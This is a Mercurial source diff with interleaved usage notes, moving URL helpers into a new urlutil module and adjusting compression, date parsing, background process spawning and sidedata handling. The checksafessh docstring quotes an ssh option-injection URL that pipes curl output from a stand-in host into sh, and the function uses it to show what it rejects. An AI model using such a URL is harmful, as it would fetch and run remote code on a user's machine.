+ msg = b'getport(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.getport(*args, **kwargs)
+
+
+def url(*args, **kwargs):
+ msg = b'url(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.url(*args, **kwargs)
+
+
+def hasscheme(*args, **kwargs):
+ msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasscheme(*args, **kwargs)
+
+
+def hasdriveletter(*args, **kwargs):
+ msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasdriveletter(*args, **kwargs)
+
+
+def urllocalpath(*args, **kwargs):
+ msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.urllocalpath(*args, **kwargs)
+
+
+def checksafessh(*args, **kwargs):
+ msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.checksafessh(*args, **kwargs)
+
+
+def hidepassword(*args, **kwargs):
+ msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hidepassword(*args, **kwargs)
+
+
+def removeauth(*args, **kwargs):
+ msg = b'removeauth(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.removeauth(*args, **kwargs)
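
Each shim keeps the old `util` name importable while warning on every call;
callers migrate by importing the new module, e.g.:

    from mercurial.utils import urlutil

    u = urlutil.url(b'https://user:secret@example.com/repo')
    masked = urlutil.hidepassword(bytes(u))
    assert masked == b'https://user:***@example.com/repo'
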
timecount = unitcountfn(
@@ -3415,6 +3106,7 @@
def sizetoint(s):
+ # type: (bytes) -> int
"""Convert a space specifier to a byte count.
>>> sizetoint(b'30')
@@ -3640,6 +3332,7 @@
def _estimatememory():
+ # type: () -> Optional[int]
"""Provide an estimate for the available system memory in Bytes.
If no estimate can be provided on the platform, returns None.
@@ -3647,7 +3340,12 @@
if pycompat.sysplatform.startswith(b'win'):
# On Windows, use the GlobalMemoryStatusEx kernel function directly.
from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
- from ctypes.wintypes import Structure, byref, sizeof, windll
+ from ctypes.wintypes import ( # pytype: disable=import-error
+ Structure,
+ byref,
+ sizeof,
+ windll,
+ )
class MEMORYSTATUSEX(Structure):
_fields_ = [
--- a/mercurial/utils/compression.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/compression.py Tue Apr 20 11:01:06 2021 -0400
@@ -685,9 +685,11 @@
# while providing no worse compression. It strikes a good balance
# between speed and compression.
level = opts.get(b'level', 3)
+ # default to single-threaded compression
+ threads = opts.get(b'threads', 0)
zstd = self._module
- z = zstd.ZstdCompressor(level=level).compressobj()
+ z = zstd.ZstdCompressor(level=level, threads=threads).compressobj()
for chunk in it:
data = z.compress(chunk)
if data:
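
The new `threads` knob maps directly onto python-zstandard; a standalone
sketch (assuming the upstream `zstandard` package; 0 keeps the old
single-threaded behaviour, -1 asks the library to use all logical CPUs):

    import zstandard as zstd

    data = b'data' * 4096
    single = zstd.ZstdCompressor(level=3, threads=0).compress(data)
    multi = zstd.ZstdCompressor(level=3, threads=-1).compress(data)
    assert zstd.ZstdDecompressor().decompress(single) == data
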
--- a/mercurial/utils/dateutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/dateutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,18 @@
pycompat,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Callable,
+ Dict,
+ Iterable,
+ Optional,
+ Tuple,
+ Union,
+ )
+
+ hgdate = Tuple[float, int] # (unixtime, offset)
+
# used by parsedate
defaultdateformats = (
b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
@@ -62,13 +74,16 @@
def makedate(timestamp=None):
+ # type: (Optional[float]) -> hgdate
"""Return a unix timestamp (or the current time) as a (unixtime,
offset) tuple based off the local timezone."""
if timestamp is None:
timestamp = time.time()
if timestamp < 0:
hint = _(b"check your clock")
- raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint)
+ raise error.InputError(
+ _(b"negative timestamp: %d") % timestamp, hint=hint
+ )
delta = datetime.datetime.utcfromtimestamp(
timestamp
) - datetime.datetime.fromtimestamp(timestamp)
@@ -77,6 +92,7 @@
def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'):
+ # type: (Optional[hgdate], bytes) -> bytes
"""represent a (unixtime, offset) tuple as a localized time.
unixtime is seconds since the epoch, and offset is the time zone's
number of seconds away from UTC.
@@ -114,11 +130,13 @@
def shortdate(date=None):
+ # type: (Optional[hgdate]) -> bytes
"""turn (timestamp, tzoff) tuple into iso 8631 date."""
return datestr(date, format=b'%Y-%m-%d')
def parsetimezone(s):
+ # type: (bytes) -> Tuple[Optional[int], bytes]
"""find a trailing timezone, if any, in string, and return a
(offset, remainder) pair"""
s = pycompat.bytestr(s)
@@ -154,6 +172,7 @@
def strdate(string, format, defaults=None):
+ # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate
"""parse a localized time string and return a (unixtime, offset) tuple.
if the string cannot be parsed, ValueError is raised."""
if defaults is None:
@@ -196,6 +215,7 @@
def parsedate(date, formats=None, bias=None):
+ # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate
"""parse a localized date/time and return a (unixtime, offset) tuple.
The date may be a "unixtime offset" string or in one of the specified
@@ -221,8 +241,11 @@
bias = {}
if not date:
return 0, 0
- if isinstance(date, tuple) and len(date) == 2:
- return date
+ if isinstance(date, tuple):
+ if len(date) == 2:
+ return date
+ else:
+ raise error.ProgrammingError(b"invalid date format")
if not formats:
formats = defaultdateformats
date = date.strip()
@@ -282,6 +305,7 @@
def matchdate(date):
+ # type: (bytes) -> Callable[[float], bool]
"""Return a function that matches a given date match specifier
Formats include:
@@ -311,10 +335,12 @@
"""
def lower(date):
+ # type: (bytes) -> float
d = {b'mb': b"1", b'd': b"1"}
return parsedate(date, extendeddateformats, d)[0]
def upper(date):
+ # type: (bytes) -> float
d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"}
for days in (b"31", b"30", b"29"):
try:
@@ -328,24 +354,26 @@
date = date.strip()
if not date:
- raise error.Abort(_(b"dates cannot consist entirely of whitespace"))
+ raise error.InputError(
+ _(b"dates cannot consist entirely of whitespace")
+ )
elif date[0:1] == b"<":
if not date[1:]:
- raise error.Abort(_(b"invalid day spec, use '<DATE'"))
+ raise error.InputError(_(b"invalid day spec, use '<DATE'"))
when = upper(date[1:])
return lambda x: x <= when
elif date[0:1] == b">":
if not date[1:]:
- raise error.Abort(_(b"invalid day spec, use '>DATE'"))
+ raise error.InputError(_(b"invalid day spec, use '>DATE'"))
when = lower(date[1:])
return lambda x: x >= when
elif date[0:1] == b"-":
try:
days = int(date[1:])
except ValueError:
- raise error.Abort(_(b"invalid day spec: %s") % date[1:])
+ raise error.InputError(_(b"invalid day spec: %s") % date[1:])
if days < 0:
- raise error.Abort(
+ raise error.InputError(
_(b"%s must be nonnegative (see 'hg help dates')") % date[1:]
)
when = makedate()[0] - days * 3600 * 24
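
The `InputError` conversions above cover the user-facing date grammar; a
quick usage sketch of the specifiers they validate:

    from mercurial.utils import dateutil

    pred = dateutil.matchdate(b'>2020-01-01')    # "on or after this date"
    when = dateutil.parsedate(b'2021-04-20')[0]  # unixtime half of hgdate
    assert pred(when)
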
--- a/mercurial/utils/procutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/procutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# procutil.py - utility for managing processes and executable environment
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -701,7 +701,88 @@
else:
- def runbgcommand(
+ def runbgcommandpy3(
+ cmd,
+ env,
+ shell=False,
+ stdout=None,
+ stderr=None,
+ ensurestart=True,
+ record_wait=None,
+ stdin_bytes=None,
+ ):
+ """Spawn a command without waiting for it to finish.
+
+
+        When `record_wait` is not None, the spawned process will not be fully
+        detached and the `record_wait` argument will be called with the
+        `Subprocess.wait` function for the spawned process. This is mostly
+        useful for developers who need to make sure the spawned process
+        finished before a certain point (e.g. when writing tests)."""
+ if pycompat.isdarwin:
+ # avoid crash in CoreFoundation in case another thread
+ # calls gui() while we're calling fork().
+ gui()
+
+ if shell:
+ script = cmd
+ else:
+ if isinstance(cmd, bytes):
+ cmd = [cmd]
+ script = b' '.join(shellquote(x) for x in cmd)
+ if record_wait is None:
+ # double-fork to completely detach from the parent process
+ script = b'( %s ) &' % script
+ start_new_session = True
+ else:
+ start_new_session = False
+ ensurestart = True
+
+ try:
+ if stdin_bytes is None:
+ stdin = subprocess.DEVNULL
+ else:
+ stdin = pycompat.unnamedtempfile()
+ stdin.write(stdin_bytes)
+ stdin.flush()
+ stdin.seek(0)
+ if stdout is None:
+ stdout = subprocess.DEVNULL
+ if stderr is None:
+ stderr = subprocess.DEVNULL
+
+ p = subprocess.Popen(
+ script,
+ shell=True,
+ env=env,
+ close_fds=True,
+ stdin=stdin,
+ stdout=stdout,
+ stderr=stderr,
+ start_new_session=start_new_session,
+ )
+ except Exception:
+ if record_wait is not None:
+ record_wait(255)
+ raise
+ finally:
+ if stdin_bytes is not None:
+ stdin.close()
+ if not ensurestart:
+ # Even though we're not waiting on the child process,
+ # we still must call waitpid() on it at some point so
+ # it's not a zombie/defunct. This is especially relevant for
+ # chg since the parent process won't die anytime soon.
+ # We use a thread to make the overhead tiny.
+            t = threading.Thread(target=lambda: p.wait())
+ t.daemon = True
+ t.start()
+ else:
+            returncode = p.wait()
+ if record_wait is not None:
+ record_wait(returncode)
+
+ def runbgcommandpy2(
cmd,
env,
shell=False,
@@ -811,3 +892,14 @@
stdin.close()
if record_wait is None:
os._exit(returncode)
+
+ if pycompat.ispy3:
+ # This branch is more robust, because it avoids running python
+ # code (hence gc finalizers, like sshpeer.__del__, which
+ # blocks). But we can't easily do the equivalent in py2,
+ # because of the lack of start_new_session=True flag. Given
+ # that the py2 branch should die soon, the short-lived
+ # duplication seems acceptable.
+ runbgcommand = runbgcommandpy3
+ else:
+ runbgcommand = runbgcommandpy2
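A standalone sketch of the detach technique `runbgcommandpy3` relies on: shell-quote the command, wrap it in `( ... ) &` so an intermediate shell forks the real child, and pass `start_new_session=True` so the grandchild is fully detached. This assumes a POSIX shell and uses illustrative names, not the Mercurial API:

    import shlex
    import subprocess

    def spawn_detached(argv):
        # "( cmd ) &" makes the shell fork an intermediate process; the
        # grandchild keeps running after both the shell and we exit
        script = "( %s ) &" % " ".join(shlex.quote(a) for a in argv)
        p = subprocess.Popen(
            script,
            shell=True,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            close_fds=True,
            start_new_session=True,
        )
        p.wait()  # reap the short-lived intermediate shell only

    spawn_detached(["sleep", "5"])  # returns immediately; sleep runs on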
--- a/mercurial/utils/resourceutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/resourceutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# resourceutil.py - utility for looking up resources
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
--- a/mercurial/utils/storageutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/storageutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -23,6 +23,7 @@
pycompat,
)
from ..interfaces import repository
+from ..revlogutils import sidedata as sidedatamod
from ..utils import hashutil
_nullhash = hashutil.sha1(nullid)
@@ -294,6 +295,7 @@
deltamode=repository.CG_DELTAMODE_STD,
revisiondata=False,
assumehaveparentrevisions=False,
+ sidedata_helpers=None,
):
"""Generic implementation of ifiledata.emitrevisions().
@@ -356,6 +358,21 @@
``nodesorder``
``revisiondata``
``assumehaveparentrevisions``
+ ``sidedata_helpers`` (optional)
+ If not None, sidedata should be included.
+ A tuple of `(repo, computers, removers)`, where `computers` and
+ `removers` are dictionaries mapping a revlog type to lists of helpers:
+ * `repo` is used as an argument for the computers
+ * each entry in `computers` is a `(keys, computer)` pair that
+ computes the missing sidedata categories that were requested:
+ * `keys` are the sidedata keys to be affected
+ * `computer` is the function `(repo, store, rev, sidedata)` that
+ returns a new sidedata dict.
+ * each entry in `removers` lists the keys corresponding to the
+ categories that are present, but not needed, and removes them.
+ If both `computers` and `removers` are empty, the sidedata is simply
+ not transformed.
+ Revlog types are `changelog`, `manifest` or `filelog`.
"""
fnode = store.node
@@ -469,6 +486,17 @@
available.add(rev)
+ sidedata = None
+ if sidedata_helpers:
+ sidedata = store.sidedata(rev)
+ sidedata = run_sidedata_helpers(
+ store=store,
+ sidedata_helpers=sidedata_helpers,
+ sidedata=sidedata,
+ rev=rev,
+ )
+ sidedata = sidedatamod.serialize_sidedata(sidedata)
+
yield resultcls(
node=node,
p1node=fnode(p1rev),
@@ -478,11 +506,31 @@
baserevisionsize=baserevisionsize,
revision=revision,
delta=delta,
+ sidedata=sidedata,
)
prevrev = rev
+def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev):
+ """Returns the sidedata for the given revision after running through
+ the given helpers.
+ - `store`: the revlog this applies to (changelog, manifest, or filelog
+ instance)
+ - `sidedata_helpers`: see `storageutil.emitrevisions`
+ - `sidedata`: previous sidedata at the given rev, if any
+ - `rev`: affected rev of `store`
+ """
+ repo, sd_computers, sd_removers = sidedata_helpers
+ kind = store.revlog_kind
+ for _keys, sd_computer in sd_computers.get(kind, []):
+ sidedata = sd_computer(repo, store, rev, sidedata)
+ for keys, _computer in sd_removers.get(kind, []):
+ for key in keys:
+ sidedata.pop(key, None)
+ return sidedata
+
+
def deltaiscensored(delta, baserev, baselenfn):
"""Determine if a delta represents censored revision data.
--- a/mercurial/utils/stringutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/stringutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# stringutil.py - utility for generic string formatting, parsing, etc.
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/utils/urlutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,792 @@
+# utils.urlutil - code related to [paths] management
+#
+# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+import os
+import re as remod
+import socket
+
+from ..i18n import _
+from ..pycompat import (
+ getattr,
+ setattr,
+)
+from .. import (
+ encoding,
+ error,
+ pycompat,
+ urllibcompat,
+)
+
+
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Union,
+ )
+
+urlreq = urllibcompat.urlreq
+
+
+def getport(port):
+ # type: (Union[bytes, int]) -> int
+ """Return the port for a given network service.
+
+ If port is an integer, it's returned as is. If it's a string, it's
+ looked up using socket.getservbyname(). If there's no matching
+ service, error.Abort is raised.
+ """
+ try:
+ return int(port)
+ except ValueError:
+ pass
+
+ try:
+ return socket.getservbyname(pycompat.sysstr(port))
+ except socket.error:
+ raise error.Abort(
+ _(b"no port number associated with service '%s'") % port
+ )
+
+
+class url(object):
+ r"""Reliable URL parser.
+
+ This parses URLs and provides attributes for the following
+ components:
+
+ <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
+
+ Missing components are set to None. The only exception is
+ fragment, which is set to '' if present but empty.
+
+ If parsefragment is False, fragment is included in query. If
+ parsequery is False, query is included in path. If both are
+ False, both fragment and query are included in path.
+
+ See http://www.ietf.org/rfc/rfc2396.txt for more information.
+
+ Note that for backward compatibility reasons, bundle URLs do not
+ take host names. That means 'bundle://../' has a path of '../'.
+
+ Examples:
+
+ >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
+ <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
+ >>> url(b'ssh://[::1]:2200//home/joe/repo')
+ <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
+ >>> url(b'file:///home/joe/repo')
+ <url scheme: 'file', path: '/home/joe/repo'>
+ >>> url(b'file:///c:/temp/foo/')
+ <url scheme: 'file', path: 'c:/temp/foo/'>
+ >>> url(b'bundle:foo')
+ <url scheme: 'bundle', path: 'foo'>
+ >>> url(b'bundle://../foo')
+ <url scheme: 'bundle', path: '../foo'>
+ >>> url(br'c:\foo\bar')
+ <url path: 'c:\\foo\\bar'>
+ >>> url(br'\\blah\blah\blah')
+ <url path: '\\\\blah\\blah\\blah'>
+ >>> url(br'\\blah\blah\blah#baz')
+ <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
+ >>> url(br'file:///C:\users\me')
+ <url scheme: 'file', path: 'C:\\users\\me'>
+
+ Authentication credentials:
+
+ >>> url(b'ssh://joe:xyz@x/repo')
+ <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
+ >>> url(b'ssh://joe@x/repo')
+ <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
+
+ Query strings and fragments:
+
+ >>> url(b'http://host/a?b#c')
+ <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
+ >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
+ <url scheme: 'http', host: 'host', path: 'a?b#c'>
+
+ Empty path:
+
+ >>> url(b'')
+ <url path: ''>
+ >>> url(b'#a')
+ <url path: '', fragment: 'a'>
+ >>> url(b'http://host/')
+ <url scheme: 'http', host: 'host', path: ''>
+ >>> url(b'http://host/#a')
+ <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
+
+ Only scheme:
+
+ >>> url(b'http:')
+ <url scheme: 'http'>
+ """
+
+ _safechars = b"!~*'()+"
+ _safepchars = b"/!~*'()+:\\"
+ _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
+
+ def __init__(self, path, parsequery=True, parsefragment=True):
+ # type: (bytes, bool, bool) -> None
+ # We slowly chomp away at path until we have only the path left
+ self.scheme = self.user = self.passwd = self.host = None
+ self.port = self.path = self.query = self.fragment = None
+ self._localpath = True
+ self._hostport = b''
+ self._origpath = path
+
+ if parsefragment and b'#' in path:
+ path, self.fragment = path.split(b'#', 1)
+
+ # special case for Windows drive letters and UNC paths
+ if hasdriveletter(path) or path.startswith(b'\\\\'):
+ self.path = path
+ return
+
+ # For compatibility reasons, we can't handle bundle paths as
+ # normal URLs
+ if path.startswith(b'bundle:'):
+ self.scheme = b'bundle'
+ path = path[7:]
+ if path.startswith(b'//'):
+ path = path[2:]
+ self.path = path
+ return
+
+ if self._matchscheme(path):
+ parts = path.split(b':', 1)
+ if parts[0]:
+ self.scheme, path = parts
+ self._localpath = False
+
+ if not path:
+ path = None
+ if self._localpath:
+ self.path = b''
+ return
+ else:
+ if self._localpath:
+ self.path = path
+ return
+
+ if parsequery and b'?' in path:
+ path, self.query = path.split(b'?', 1)
+ if not path:
+ path = None
+ if not self.query:
+ self.query = None
+
+ # // is required to specify a host/authority
+ if path and path.startswith(b'//'):
+ parts = path[2:].split(b'/', 1)
+ if len(parts) > 1:
+ self.host, path = parts
+ else:
+ self.host = parts[0]
+ path = None
+ if not self.host:
+ self.host = None
+ # path of file:///d is /d
+ # path of file:///d:/ is d:/, not /d:/
+ if path and not hasdriveletter(path):
+ path = b'/' + path
+
+ if self.host and b'@' in self.host:
+ self.user, self.host = self.host.rsplit(b'@', 1)
+ if b':' in self.user:
+ self.user, self.passwd = self.user.split(b':', 1)
+ if not self.host:
+ self.host = None
+
+ # Don't split on colons in IPv6 addresses without ports
+ if (
+ self.host
+ and b':' in self.host
+ and not (
+ self.host.startswith(b'[') and self.host.endswith(b']')
+ )
+ ):
+ self._hostport = self.host
+ self.host, self.port = self.host.rsplit(b':', 1)
+ if not self.host:
+ self.host = None
+
+ if (
+ self.host
+ and self.scheme == b'file'
+ and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
+ ):
+ raise error.Abort(
+ _(b'file:// URLs can only refer to localhost')
+ )
+
+ self.path = path
+
+ # leave the query string escaped
+ for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
+ v = getattr(self, a)
+ if v is not None:
+ setattr(self, a, urlreq.unquote(v))
+
+ def copy(self):
+ u = url(b'temporary useless value')
+ u.path = self.path
+ u.scheme = self.scheme
+ u.user = self.user
+ u.passwd = self.passwd
+ u.host = self.host
+ u.query = self.query
+ u.fragment = self.fragment
+ u._localpath = self._localpath
+ u._hostport = self._hostport
+ u._origpath = self._origpath
+ return u
+
+ @encoding.strmethod
+ def __repr__(self):
+ attrs = []
+ for a in (
+ b'scheme',
+ b'user',
+ b'passwd',
+ b'host',
+ b'port',
+ b'path',
+ b'query',
+ b'fragment',
+ ):
+ v = getattr(self, a)
+ if v is not None:
+ attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
+ return b'<url %s>' % b', '.join(attrs)
+
+ def __bytes__(self):
+ r"""Join the URL's components back into a URL string.
+
+ Examples:
+
+ >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
+ 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
+ 'http://user:pw@host:80/?foo=bar&baz=42'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
+ 'http://user:pw@host:80/?foo=bar%3dbaz'
+ >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
+ 'ssh://user:pw@[::1]:2200//home/joe#'
+ >>> bytes(url(b'http://localhost:80//'))
+ 'http://localhost:80//'
+ >>> bytes(url(b'http://localhost:80/'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'http://localhost:80'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'bundle:foo'))
+ 'bundle:foo'
+ >>> bytes(url(b'bundle://../foo'))
+ 'bundle:../foo'
+ >>> bytes(url(b'path'))
+ 'path'
+ >>> bytes(url(b'file:///tmp/foo/bar'))
+ 'file:///tmp/foo/bar'
+ >>> bytes(url(b'file:///c:/tmp/foo/bar'))
+ 'file:///c:/tmp/foo/bar'
+ >>> print(url(br'bundle:foo\bar'))
+ bundle:foo\bar
+ >>> print(url(br'file:///D:\data\hg'))
+ file:///D:\data\hg
+ """
+ if self._localpath:
+ s = self.path
+ if self.scheme == b'bundle':
+ s = b'bundle:' + s
+ if self.fragment:
+ s += b'#' + self.fragment
+ return s
+
+ s = self.scheme + b':'
+ if self.user or self.passwd or self.host:
+ s += b'//'
+ elif self.scheme and (
+ not self.path
+ or self.path.startswith(b'/')
+ or hasdriveletter(self.path)
+ ):
+ s += b'//'
+ if hasdriveletter(self.path):
+ s += b'/'
+ if self.user:
+ s += urlreq.quote(self.user, safe=self._safechars)
+ if self.passwd:
+ s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
+ if self.user or self.passwd:
+ s += b'@'
+ if self.host:
+ if not (self.host.startswith(b'[') and self.host.endswith(b']')):
+ s += urlreq.quote(self.host)
+ else:
+ s += self.host
+ if self.port:
+ s += b':' + urlreq.quote(self.port)
+ if self.host:
+ s += b'/'
+ if self.path:
+ # TODO: similar to the query string, we should not unescape the
+ # path when we store it, the path might contain '%2f' = '/',
+ # which we should *not* escape.
+ s += urlreq.quote(self.path, safe=self._safepchars)
+ if self.query:
+ # we store the query in escaped form.
+ s += b'?' + self.query
+ if self.fragment is not None:
+ s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
+ return s
+
+ __str__ = encoding.strmethod(__bytes__)
+
+ def authinfo(self):
+ user, passwd = self.user, self.passwd
+ try:
+ self.user, self.passwd = None, None
+ s = bytes(self)
+ finally:
+ self.user, self.passwd = user, passwd
+ if not self.user:
+ return (s, None)
+ # authinfo[1] is passed to urllib2 password manager, and its
+ # URIs must not contain credentials. The host is passed in the
+ # URIs list because Python < 2.4.3 uses only that to search for
+ # a password.
+ return (s, (None, (s, self.host), self.user, self.passwd or b''))
+
+ def isabs(self):
+ if self.scheme and self.scheme != b'file':
+ return True # remote URL
+ if hasdriveletter(self.path):
+ return True # absolute for our purposes - can't be joined()
+ if self.path.startswith(br'\\'):
+ return True # Windows UNC path
+ if self.path.startswith(b'/'):
+ return True # POSIX-style
+ return False
+
+ def localpath(self):
+ # type: () -> bytes
+ if self.scheme == b'file' or self.scheme == b'bundle':
+ path = self.path or b'/'
+ # For Windows, we need to promote hosts containing drive
+ # letters to paths with drive letters.
+ if hasdriveletter(self._hostport):
+ path = self._hostport + b'/' + self.path
+ elif (
+ self.host is not None and self.path and not hasdriveletter(path)
+ ):
+ path = b'/' + path
+ return path
+ return self._origpath
+
+ def islocal(self):
+ '''whether localpath will return something that posixfile can open'''
+ return (
+ not self.scheme
+ or self.scheme == b'file'
+ or self.scheme == b'bundle'
+ )
+
+
+def hasscheme(path):
+ # type: (bytes) -> bool
+ return bool(url(path).scheme) # cast to help pytype
+
+
+def hasdriveletter(path):
+ # type: (bytes) -> bool
+ return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
+
+
+def urllocalpath(path):
+ # type: (bytes) -> bytes
+ return url(path, parsequery=False, parsefragment=False).localpath()
+
+
+def checksafessh(path):
+ # type: (bytes) -> None
+ """check if a path / url is a potentially unsafe ssh exploit (SEC)
+
+ This is a sanity check for ssh urls. ssh will parse the first item as
+ an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
+ Let's prevent these potentially exploitable urls entirely and warn the
+ user.
+
+ Raises an error.Abort when the url is unsafe.
+ """
+ path = urlreq.unquote(path)
+ if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
+ raise error.Abort(
+ _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
+ )
+
+
+def hidepassword(u):
+ # type: (bytes) -> bytes
+ '''hide user credential in a url string'''
+ u = url(u)
+ if u.passwd:
+ u.passwd = b'***'
+ return bytes(u)
+
+
+def removeauth(u):
+ # type: (bytes) -> bytes
+ '''remove all authentication information from a url string'''
+ u = url(u)
+ u.user = u.passwd = None
+ return bytes(u)
+
+
+def get_push_paths(repo, ui, dests):
+ """yields all the `path` selected as push destination by `dests`"""
+ if not dests:
+ if b'default-push' in ui.paths:
+ yield ui.paths[b'default-push']
+ elif b'default' in ui.paths:
+ yield ui.paths[b'default']
+ else:
+ raise error.ConfigError(
+ _(b'default repository not configured!'),
+ hint=_(b"see 'hg help config.paths'"),
+ )
+ else:
+ for dest in dests:
+ yield ui.getpath(dest)
+
+
+def get_pull_paths(repo, ui, sources, default_branches=()):
+ """yields all the `(path, branch)` selected as pull source by `sources`"""
+ if not sources:
+ sources = [b'default']
+ for source in sources:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance as warnings might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
+ yield parseurl(url, default_branches)
+
+
+def get_unique_push_path(action, repo, ui, dest=None):
+ """return a unique `path` or abort if multiple are found
+
+ This is useful for commands and actions that do not support multiple
+ destinations (yet).
+
+ Note that for now we cannot get multiple destinations, so this function is "trivial".
+
+ The `action` parameter will be used for the error message.
+ """
+ if dest is None:
+ dests = []
+ else:
+ dests = [dest]
+ dests = list(get_push_paths(repo, ui, dests))
+ assert len(dests) == 1
+ return dests[0]
+
+
+def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
+ """return a unique `(path, branch)` or abort if multiple are found
+
+ This is useful for commands and actions that do not support multiple
+ destinations (yet).
+
+ Note that for now we cannot get multiple destinations, so this function is "trivial".
+
+ The `action` parameter will be used for the error message.
+ """
+ if source is None:
+ if b'default' in ui.paths:
+ url = ui.paths[b'default'].rawloc
+ else:
+ # XXX this is the historical default behavior, but that is not
+ # great, consider breaking BC on this.
+ url = b'default'
+ else:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance as warnings might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
+ return parseurl(url, default_branches)
+
+
+def get_clone_path(ui, source, default_branches=()):
+ """return the `(origsource, path, branch)` selected as clone source"""
+ if source is None:
+ if b'default' in ui.paths:
+ url = ui.paths[b'default'].rawloc
+ else:
+ # XXX this is the historical default behavior, but that is not
+ # great, consider breaking BC on this.
+ url = b'default'
+ else:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance as warnings might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
